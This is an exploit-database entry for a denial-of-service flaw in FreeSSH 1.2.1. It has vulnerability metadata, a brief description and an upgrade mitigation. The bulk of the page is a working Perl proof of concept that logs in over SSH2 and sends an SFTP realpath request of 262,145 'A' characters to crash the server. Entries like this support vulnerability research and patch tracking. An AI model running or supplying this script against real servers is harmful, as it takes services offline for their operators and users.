header-logo
Suggest Exploit
vendor:
FreeSSH
by:
Jeremy Brown
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: FreeSSH
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:freessh:freessh:1.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FreeSSH 1.2.1 Crash #2

This exploit causes a denial of service (DoS) in FreeSSH 1.2.1 by sending a string of 262145 'A' characters to the SSH2 server. This causes the server to crash.

Mitigation:

Upgrade to the latest version of FreeSSH.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.
use Net::SSH2;

$host     = "192.168.0.100";
$port     = 22;
$username = "test";
$password = "test";
$dos      = "A" x 262145;

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)               || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$realpath = $sftp->realpath($dos);
$ssh2->disconnect();
exit;

# milw0rm.com [2008-10-22]

Navigation

Suggest Exploit

Services By CQR